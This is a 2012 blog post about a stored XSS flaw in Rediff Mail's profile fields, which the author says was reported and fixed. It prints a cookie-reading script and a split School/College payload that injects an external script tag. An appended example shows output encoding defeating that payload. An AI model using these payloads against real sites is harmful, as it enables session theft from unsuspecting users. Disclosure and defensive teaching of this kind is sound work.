Monday, November 12, 2012

Stored XSS On Rediff Mail

Hi guys, I recently discovered a stored XSS issue on Rediff Mail and also reported it to Rediff recently. :-)
I didn't get any credit, but never mind.
They dropped me a mail on my personal ID saying the issue has now been fixed.
I will show an exact demonstration of that stored XSS issue.
But first of all, I will explain what XSS basically is.

XSS (Cross-Site Scripting)-
Cross-site scripting attacks are a type of injection problem in which malicious scripts are injected into otherwise benign and trusted web sites.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute it. Because the browser believes the script came from a trusted origin, the malicious script can read cookies (any not flagged HttpOnly), session tokens, and other sensitive information the browser holds for that site, and can act on the site as the logged-in user.
There are basically two types of XSS:
1) Reflected XSS attacks, where the payload travels in the request (typically a crafted link) and is echoed straight back in the response.
2) Stored XSS attacks, where the payload is saved by the server and served to every user who later views the affected page.

So, let's get started with the attack.
This is a critical vulnerability: the victim only has to view the attacker's profile, with no link to click, and the malicious script executes in the victim's browser with the victim's Rediff Mail session.
Here is a proof of concept of the stored XSS on Rediffmail :)
1) Hosted a JavaScript file (xss.js) locally with the following content. It writes the cookies into the page and pops an alert containing them; note that document.cookie only exposes cookies that are not flagged HttpOnly, and a real attacker would send the value to a server they control rather than alert it:

    document.write("Stored XSS " + document.cookie);
    alert("cookie Value" + document.cookie);

Hosted JavaScript for XSS:Securityvin32
2) Parameters affected: School and College, combined.
Here is the tricky part I faced during the XSS:
neither the individual School parameter nor the individual College parameter gave the XSS alert.
So I tried to combine both fields using the following vector:
School:
    /><SCRIPT SRC="http://localhost/xss/xss.js"/*
College:
    */></SCRIPT>

The two halves only form a complete SCRIPT element once the profile page renders the School value and the College value next to each other: whatever the page itself puts between them (a separator, for instance) lands inside the opening tag, between /* and */, and the College value then closes it. Because the tag carries a src attribute, the browser fetches and runs xss.js. The localhost URL only resolves on the author's own machine; in a real attack the file would be hosted somewhere the victim's browser can reach.

3) After the attack vector is saved in the attacker's profile,
any user who views that profile gets the malicious script executed in their browser.
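To make the split-field point concrete, here is an added example in JavaScript (not Rediff's code and not from the original post). It models a profile page that renders the School and College values side by side; the template, the ", " separator and the per-field filter are assumptions, since the real page's markup and checks are not known. It shows the two halves of the payload passing a per-field check, reassembling into a working external-script tag when concatenated, and being neutralised by HTML-encoding each value at output time.

```javascript
// Added example, not Rediff's code. Simulates a profile page that renders two
// stored fields next to each other and shows (a) that a per-field check which
// only rejects a complete <script> element passes both halves of the split
// payload, (b) that raw concatenation reassembles them into a working
// external-script tag, and (c) that HTML-encoding each field at output time
// neutralises it. The template, the ", " separator and the per-field filter
// are assumptions for illustration; the real page's markup is not known.
'use strict';

// The two halves of the payload from the post (School, then College).
const SCHOOL_PAYLOAD = '/><SCRIPT SRC="http://localhost/xss/xss.js"/*';
const COLLEGE_PAYLOAD = '*/></SCRIPT>';

// Hypothetical per-field filter: rejects only a self-contained script element.
// Returns true when the value is accepted. A split payload slips past it.
function naiveFieldFilter(value) {
  return !/<script\b[^>]*>[\s\S]*?<\/script\s*>/i.test(value);
}

// Vulnerable rendering (assumed template): values inserted unencoded.
function renderProfileVulnerable(school, college) {
  return '<td class="education">' + school + ', ' + college + '</td>';
}

// Minimal HTML entity encoding for text and double-quoted attribute contexts.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: same template, each field encoded for its context.
function renderProfileSafe(school, college) {
  return '<td class="education">' + escapeHtml(school) + ', ' + escapeHtml(college) + '</td>';
}

// Rough stand-in for the browser: find a <script> start tag carrying a src
// attribute and return the URL it would fetch, or null. A regex is not an
// HTML parser, but it is enough for this fixed markup.
function externalScriptSrc(html) {
  const m = /<script\b[^>]*\bsrc\s*=\s*"([^"]*)"/i.exec(html);
  return m ? m[1] : null;
}

// Check the rendered fragment, not the individual inputs: this is the only
// place where a split payload becomes visible.
function profileIsSafe(school, college, render) {
  return externalScriptSrc(render(school, college)) === null;
}

// Demonstration when run directly with node.
if (typeof require !== 'undefined' && typeof module !== 'undefined' && require.main === module) {
  console.log('School alone passes filter:', naiveFieldFilter(SCHOOL_PAYLOAD));
  console.log('College alone passes filter:', naiveFieldFilter(COLLEGE_PAYLOAD));
  const vuln = renderProfileVulnerable(SCHOOL_PAYLOAD, COLLEGE_PAYLOAD);
  console.log('Vulnerable render:', vuln);
  console.log('Browser would fetch:', externalScriptSrc(vuln));
  const safe = renderProfileSafe(SCHOOL_PAYLOAD, COLLEGE_PAYLOAD);
  console.log('Hardened render:', safe);
  console.log('Browser would fetch:', externalScriptSrc(safe));
}
```

The lesson for defenders: encode every field for the context it is rendered in, and if you also filter, run the filter over the rendered fragment rather than over each input in isolation, because a payload can be harmless in each field and dangerous only in combination.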